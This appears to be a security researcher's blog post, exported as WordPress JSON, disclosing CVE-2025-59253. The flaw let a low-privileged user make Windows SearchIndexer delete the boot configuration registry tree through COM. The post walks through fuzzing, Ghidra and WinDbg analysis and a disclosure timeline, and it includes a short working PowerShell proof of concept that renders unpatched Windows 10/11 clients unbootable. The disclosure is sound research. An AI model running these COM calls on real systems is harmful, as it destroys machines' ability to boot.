{"id":9316,"date":"2025-11-17T15:30:27","date_gmt":"2025-11-17T14:30:27","guid":{"rendered":"https:\/\/dev.warpnet.nl\/?p=9316"},"modified":"2025-12-08T13:18:03","modified_gmt":"2025-12-08T12:18:03","slug":"deleting-the-bcd-through-com-as-low-privileged-user","status":"publish","type":"post","link":"https:\/\/warpnet.nl\/en\/blog\/deleting-the-bcd-through-com-as-low-privileged-user\/","title":{"rendered":"Deleting the BCD through COM as low privileged user"},"content":{"rendered":"<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<p class=\"has-medium-font-size\" style=\"font-style:normal;font-weight:500\">This article is written by Remco:<\/p>\n\n\n\n<div class=\"wp-block-columns are-vertically-aligned-center is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-vertically-aligned-center is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:25%\"><div class=\"wp-block-image is-style-rounded\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"2412\" height=\"2412\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120.jpg\" alt=\"\" class=\"wp-image-9317\" style=\"object-fit:cover;width:82px;height:auto\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120.jpg 2412w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-300x300.jpg 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-1024x1024.jpg 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-150x150.jpg 150w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-768x768.jpg 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-1536x1536.jpg 1536w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-2048x2048.jpg 2048w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-12x12.jpg 12w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4A2A2120-1080x1080.jpg 1080w\" sizes=\"(max-width: 2412px) 100vw, 2412px\"\/><\/figure>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-column is-vertically-aligned-center is-layout-flow wp-block-column-is-layout-flow\">\n<p class=\"has-text-color has-medium-font-size\" style=\"color:#1d2537\"><strong><a href=\"https:\/\/www.linkedin.com\/in\/remco-vandermeer\/\" target=\"_blank\" rel=\"noopener\">Remco van der Meer<\/a><\/strong><br>Ethical Hacker<\/p>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n\n\n\n<p class=\"has-medium-font-size\">CVE-2025-59253: Demonstrating a vulnerability in Windows that leads to a low privileged user being able to delete the boot configuration data (BCD) through COM.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<p>During my research into Component Object Model (COM) and DCOM (Distrubuted COM), I stumbled upon a interesting vulnerability in the Windows <code>SearchIndexer<\/code> process. This vulnerability allowed a low privileged user (user without administrative privileges or any additional tokens), to let the <code>SearchIndexer<\/code> process delete all registry keys under the <code>HKLM\\BCD<\/code> registry key, essentially making the system unbootable.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Vulnerable systems were only Windows clients, version 10 and 11.<\/li>\n\n\n\n<li>This vulnerability was fixed with patch tuesday in October (14th of October) 2025, by Microsoft.<\/li>\n\n\n\n<li>For this vulnerability, a bounty was awared and <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/en-US\/advisory\/CVE-2025-59253\" target=\"_blank\" rel=\"noopener\">CVE-2025-59253<\/a> was assigned.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Discovering the vulnerability<\/h2>\n\n\n\n<p>COM\/DCOM has been a interesting component in Windows from a security perspective for many years. In the past, COM has been a target for many different purposes. Not only have many vulnerabilities been discovered in COM, but it is also used for lateral movement or bypassing techniques.<\/p>\n\n\n\n<p>Because of this, many (security) research is already conducted in this area. So to look for new vulnerabilities, another approach would probably lead to better results (vulnerabilities). I couldn&#x2019;t find any tooling\/blogs related to fuzzing COM\/DCOM, but correct me if I&#x2019;m wrong. As fuzzing MS-RPC was proven to be a successful approach to discovering new vulnerabilities, I wondered if the same concept could be applied to COM\/DCOM.<\/p>\n\n\n\n<p>I decided to write a fuzzer around the <a href=\"https:\/\/github.com\/tyranid\/oleviewdotnet\" target=\"_blank\" rel=\"noopener\">OleViewDotNet<\/a> tool from <a href=\"https:\/\/x.com\/tiraniddo\">James Forshaw<\/a>. <code>You can find the COM-fuzzer tool <a href=\"https:\/\/github.com\/warpnet\/COM-Fuzzer\" target=\"_blank\" rel=\"noopener\">here<\/a><\/code>.<\/p>\n\n\n\n<p>I ran the fuzzer against an up-to-date Windows 11 system. After rebooting the system, it didn&#x2019;t boot at all. Instead, I was asked to choose the keyboard layout.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"633\" height=\"504\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2.png\" alt=\"\" class=\"wp-image-9326\" style=\"width:620px;height:auto\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2.png 633w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2-300x239.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/2-15x12.png 15w\" sizes=\"(max-width: 633px) 100vw, 633px\"\/><figcaption class=\"wp-element-caption\">Choose your keyboard layout shown instead of booting the system<\/figcaption><\/figure>\n<\/div>\n\n\n<p>Trying to repair the system through advanced options also didn&#x2019;t resolve the issue. Luckily, I made snapshots before starting the fuzzer. After rolling back to a working state of the machine, I ran the fuzzer again to make sure the fuzzer actually causes the system to be unbootable and that it wasn&#x2019;t a coincidence. And yes, after fuzzing all methods again, the system was again unbootable. Because I was fuzzing the system using a low privileged user context, this was very interesting.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Getting to the root cause<\/h2>\n\n\n\n<p>Because I ran my fuzzer against about 200 classes with a total of about 5000 procedures, it was hard to tell which class, let alone which procedure(s), were responsible for making the system unbootable. Since I am doing blackbox fuzzing, it could be ANY procedure that was responsible. Of course I checked the logs of Windows for any errors\/warnings, but this was all clean. It actually took me 2 nights to find the right class and procedures. My approach was splitting the classes in half each time and then fuzzing those classes, reboot the system, and repeat.<\/p>\n\n\n\n<p>I eventually figured out that sometimes the system was perfectly bootable and sometimes it wasn&#x2019;t. This led to me doing cutting the classes in half approach a couple times over. The only left over class was Windows Search Manager with CLSID <code>7d096c5f-ac08-4f1f-beb7-5c22c517ce39<\/code>. This Class has a couple of interfaces where one of course is the required <code>IUnknown<\/code> interface. The interface with the responsible procedures is <code>dbab3f73-db19-4a79-bfc0-a61a93886ddf<\/code>. The following is a snippet of the output for the Class of the COM Fuzzer that I wrote:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; JSON\" class=\"wp-block-code\"><code lang=\"json\" class=\"language-json line-numbers\">{\n  &quot;ClassName&quot;: &quot;Windows Search Manager&quot;,\n  &quot;CLSID&quot;: &quot;7d096c5f-ac08-4f1f-beb7-5c22c517ce39&quot;\n  &quot;Interfaces&quot;: [\n    {\n      &quot;InterfaceName&quot;: &quot;ISearchManager2&quot;,\n      &quot;IID&quot;: &quot;dbab3f73-db19-4a79-bfc0-a61a93886ddf&quot;,\n      &quot;Methods&quot;: [\n        &quot;Proc10_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc10(string p0)&quot;,\n        &quot;Proc11_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc11()&quot;,\n        &quot;int Proc12(string p0)&quot;,\n        &quot;Proc13_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc13()&quot;,\n        &quot;Proc14_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc14()&quot;,\n        &quot;Proc15_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc15()&quot;,\n        &quot;Proc16_RetVal Proc16(string p0)&quot;,\n        &quot;int Proc17(string p0)&quot;,\n        &quot;Proc3_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc3()&quot;,\n        &quot;Proc4_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc4()&quot;,\n        &quot;Proc5_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc5(string p0)&quot;,\n        &quot;int Proc6(string p0, Struct_117, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null p1)&quot;,\n        &quot;Proc7_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc7()&quot;,\n        &quot;Proc8_RetVal, 4usipont, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null Proc8()&quot;,\n        &quot;int Proc9(NtApiDotNet.Ndr.Marshal.NdrEnum16 p0, int p1, int p2, string p3, string p4)&quot;\n      ]\n    }\n  ]\n}\n```<\/code><\/pre>\n\n\n\n<p>After even more trial and error, I figured out that I first had to call <code>Proc10(string p0)<\/code> before I was able to call some of the other procedures within the interface. <code>Proc10<\/code> probably initiates some object that is being used as reference for the other procedures, since <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/searchapi\/nn-searchapi-isearchmanager2\" target=\"_blank\" rel=\"noopener\">the documentation for ISearchManager2<\/a> is limited, I am not sure.<\/p>\n\n\n\n<p>When calling <code>Proc16(string p0)<\/code> after <code>Proc10<\/code> using any input expect for special characters, the process starts deleting keys under the <code>HKLM\\SOFTWARE\\Microsoft\\Windows Search\\<\/code> registry path as <code>NT\\Authority System<\/code>. This can be observed using Process Monitor and using filters.<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; PowerShell\" class=\"wp-block-code\"><code lang=\"powershell\" class=\"language-powershell line-numbers\"> $cs = Get-ComClass-Clsid 7d096c5f-ac08-4f1f-beb7-5c22c517ce39\n $IntObj = New-ComObject-Class $cs\n $ComClient = Get-ComObjectInterface-Object $IntObj-Iid dbab3f73-db19-4a79-bfc0-a61a93886ddf\n $ComClient.Proc10(&quot;a&quot;)\n $ComClient.Proc16(&quot;b&quot;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1144\" height=\"506\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-1024x453.png\" alt=\"\" class=\"wp-image-9327\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-1024x453.png 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-300x133.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-768x340.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3-18x8.png 18w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/3.png 1144w\" sizes=\"(max-width: 1144px) 100vw, 1144px\"\/><figcaption class=\"wp-element-caption\">Registry keys being deleted as NT\\Authority System<\/figcaption><\/figure>\n\n\n\n<p>So far, no keys are being deleted that actually harm the system. However, when the string input for <code>Proc16<\/code> contains a special character (such as <code>.<\/code> or <code>\/<\/code>), the process deletes everything under <code>HKLM\\BCD<\/code>.<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; PowerShell\" class=\"wp-block-code\"><code lang=\"powershell\" class=\"language-powershell line-numbers\">$ComClient.Proc16(&quot;.&quot;)<\/code><\/pre>\n\n\n\n<p>Process Monitor results:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"398\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-1024x398.png\" alt=\"\" class=\"wp-image-9328\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-1024x398.png 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-300x117.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-768x299.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4-18x7.png 18w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/4.png 1119w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\/><figcaption class=\"wp-element-caption\">BCD Registry keys being deleted as NT\\Authority System<\/figcaption><\/figure>\n\n\n\n<p>And that of course is a problem, because BCD is a binary database that contains boot-time configuration parameters. It essentially tells Windows how to start up. This path in the registry is protected by ACLs and only SYSTEM has full control over it.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Using WinDbg and Ghidra to find the responsible function<\/h3>\n\n\n\n<p>Now that we know which procedures are responsible for deleting the keys, we can use WinDbg and Ghidra to get a better understanding of the vulnerability. Since the whole tree for BCD is deleted, it is likely that the <code>RegDeleteTree<\/code> operation is used.<\/p>\n\n\n\n<p>Using Ghidra, we drop the <code>&quot;C:\\Windows\\System32\\SearchIndexer.exe&quot;<\/code> binary and disassemble it. Lucky for us, there is only one function that includes the <code>RegDeleteTree<\/code> operation:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1022\" height=\"207\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5.png\" alt=\"\" class=\"wp-image-9329\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5.png 1022w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5-300x61.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5-768x156.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/5-18x4.png 18w\" sizes=\"(max-width: 1022px) 100vw, 1022px\"\/><figcaption class=\"wp-element-caption\">Searching for RegDeleteTree in Ghidra<\/figcaption><\/figure>\n\n\n\n<p>The function that includes the operation is:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; C\" class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp line-numbers\">void FUN_14007604c(undefined8 param_1,wchar_t *param_2)\n\n{\n  ulonglong uVar1;\n  LPCWSTR lpSubKey;\n  undefined1 auStack_258 [48];\n  WCHAR local_228 [264];\n  ulonglong local_18;\n  \n  local_18 = DAT_1400e1ac0 ^ (ulonglong)auStack_258;\n  uVar1 = FUN_1400103d4(param_1,-0x7ffffffe,param_2,local_228);\n  lpSubKey = local_228;\n  if ((char)uVar1 == '\\0') {\n    lpSubKey = param_2;\n  }\n  RegDeleteTreeW((HKEY)0xffffffff80000002,lpSubKey); \/* Hmmm....*\/\n  FUN_140050600(local_18 ^ (ulonglong)auStack_258);\n  return;\n}<\/code><\/pre>\n\n\n\n<p>So we see the <code>RegDeleteTreeW<\/code> function on line 16 and notice that it is pointing to <code>HKEY<\/code> with hex <code>0xffffffff80000002<\/code>, which equates to <code>HKEY_LOCAL_MACHINE<\/code>. Next is <code>lpSubKey<\/code>. And we are actually interested in what this value is when we are deleting BCD. So we can attach the SearchIndexer process to WinDbg and look for the memory address:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"739\" height=\"292\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6.png\" alt=\"\" class=\"wp-image-9319\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6.png 739w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6-300x119.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/6-18x7.png 18w\" sizes=\"(max-width: 739px) 100vw, 739px\"\/><figcaption class=\"wp-element-caption\">Getting the memory address for SearchIndexer using WinDbg<\/figcaption><\/figure>\n\n\n\n<p>Back in Ghidra, we set the address <code>7ff7d1c50000<\/code> to the base image address and go back to the vulnerable function. The line containing the <code>RegDeleteTreeW<\/code> has the following memory address:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"611\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-1024x611.png\" alt=\"\" class=\"wp-image-9320\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-1024x611.png 1024w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-300x179.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-768x458.png 768w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7-18x12.png 18w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/7.png 1033w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\/><figcaption class=\"wp-element-caption\">Getting the memory address for the RegDeleteTreeW line<\/figcaption><\/figure>\n\n\n\n<p>In WinDbg we set a breakpoint on this address:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code lang=\"\" class=\"\">0:034&gt; bl\n     0 e Disable Clear  00007ff7`d1cc6090     0001 (0001)  0:**** SearchIndexer+0x76090<\/code><\/pre>\n\n\n\n<p>We are good to go. We run the debugger and perform our exploit by entering the following in PowerShell:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; PowerShell\" class=\"wp-block-code\"><code lang=\"powershell\" class=\"language-powershell\">powershell\n$cs = Get-ComClass -Clsid 7d096c5f-ac08-4f1f-beb7-5c22c517ce39\n$IntObj = New-ComObject -Class $cs\n$ComClient = Get-ComObjectInterface -Object $IntObj -Iid dbab3f73-db19-4a79-bfc0-a61a93886ddf\n$ComClient.Proc10(&quot;a&quot;)\n$ComClient.Proc16(&quot;,&quot;)<\/code><\/pre>\n\n\n\n<p>The breakpoint hits in WinDbg:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code class=\"\">00007ff7`d1cc6090 48ff1509030400  call    qword ptr [SearchIndexer+0xb63a0 (00007ff7`d1d063a0)] ds:00007ff7`d1d063a0={KERNELBASE!RegDeleteTreeW (00007ffe`3c2479f0)}<\/code><\/pre>\n\n\n\n<p>We can now view the register values.<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code class=\"\">0:035&gt; r\n\nrax=0000000000000000 rbx=0000008002ee1798 rcx=ffffffff80000002\nrdx=0000008002ee1798 rsi=0000008002d3fb84 rdi=00000080040efb00\nrip=00007ff7d1cc6090 rsp=000000800357dc90 rbp=000000800357e140\n r8=0000008002ee1798  r9=000000800357dcc0 r10=00007ffe3c8b0000\nr11=000000800357dc70 r12=00000080024ddda0 r13=00007ff7d1d08d80\nr14=0000000000000000 r15=00000080040efb00\niopl=0         nv up ei pl zr na po nc\ncs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246\nSearchIndexer+0x76090:\n00007ff7`d1cc6090 48ff1509030400  call    qword ptr [SearchIndexer+0xb63a0 (00007ff7`d1d063a0)] ds:00007ff7`d1d063a0={KERNELBASE!RegDeleteTreeW (00007ffe`3c2479f0)}<\/code><\/pre>\n\n\n\n<p>We can use `da` to convert the memory address of `rsi` to a string:<\/p>\n\n\n\n<pre title=\"&lt;\/&gt; Plaintext\" class=\"wp-block-code\"><code class=\"\">0:035&gt; da @rsi\n00000080`02d3fb84  &quot;,&quot;<\/code><\/pre>\n\n\n\n<p>There is our comma that we gave as input to the <code>Proc16<\/code> function, great. If we provide <code>t,est<\/code> as input, we only see <code>t<\/code> as value for <code>rsi<\/code>. This means that our user input is added to the path of the <code>RegDeleteTreeW<\/code> function, or atleast the first character. This causes the function to somehow delete the first index of <code>HKLM<\/code>, which is <code>HKLM\\BCD<\/code> by default. To proof this, I had a system setup without <code>HKLM\\BCD<\/code>, so the first index becomes <code>HKLM\\HARDWARE<\/code>. If we now make the COM calls, Process Monitor shows that the process deletes the <code>HKLM\\HARDWARE<\/code> path:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"709\" height=\"266\" src=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8.png\" alt=\"\" class=\"wp-image-9321\" srcset=\"https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8.png 709w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8-300x113.png 300w, https:\/\/warpnet.nl\/wp-content\/uploads\/2025\/11\/8-18x7.png 18w\" sizes=\"(max-width: 709px) 100vw, 709px\"\/><figcaption class=\"wp-element-caption\">Process Monitor showing that SearchIndexer removes the HKLM\\HARDWARE path<\/figcaption><\/figure>\n\n\n\n<p>I was not able to provide user input to the COM function so that it deletes another path instead of the first index. The reason why only the first character of the user input is parsed into the registry path lies deeper within the Windows Search process, which I didn&#x2019;t reverse. Yet it is a interesting bug that leads to a unusable system.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Impact<\/h2>\n\n\n\n<p>The whole reason this is a security vulnerability, is because as low privileged user on the system can execute the responsible COM functions. For malware purposes this could be to interest, because you could make the system(s) unbootable from a non-administrative context.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion and timeline<\/h2>\n\n\n\n<p>This blog post described how the fuzzing approach led to the disovery of a interesting vulnerability that allows a low-privileged user to delete all registry values for the path <code>HKLM\\BCD<\/code>. This vulnerability was disclosed to Microsoft and CVE-2025-59253 was awareded together with a bounty. I expect to find more interesting bugs using the fuzzing approach and will soon be releasing the tool itself.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>29-07-2025 &#x2013; Reported the vulnerability to Microsoft<\/li>\n\n\n\n<li>30-07-2025 &#x2013; Case opened by Microsoft<\/li>\n\n\n\n<li>12-08-2025 &#x2013; Confirmation of behaviour<\/li>\n\n\n\n<li>13-08-2025 &#x2013; Bounty awarded<\/li>\n\n\n\n<li>14-10-2025 &#x2013; Fix available in patch tuesday, CVE-2025-59253 awarded<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>During his research into Component Object Model (COM) and DCOM (Distrubuted COM), our colleague Remco stumbled upon an interesting vulnerability in the Windows SearchIndexer process. This vulnerability allowed a low privileged user (user without administrative privileges or any additional tokens), to let the SearchIndexer process delete all registry keys under the HKLM\\BCD registry key, essentially making the system unbootable.<\/p>","protected":false},"author":17,"featured_media":9325,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","content-type":"","footnotes":""},"categories":[14],"tags":[],"class_list":["post-9316","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"acf":[],"_links":{"self":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/9316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/users\/17"}],"replies":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/comments?post=9316"}],"version-history":[{"count":5,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/9316\/revisions"}],"predecessor-version":[{"id":9938,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/9316\/revisions\/9938"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/media\/9325"}],"wp:attachment":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/media?parent=9316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/categories?post=9316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/tags?post=9316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}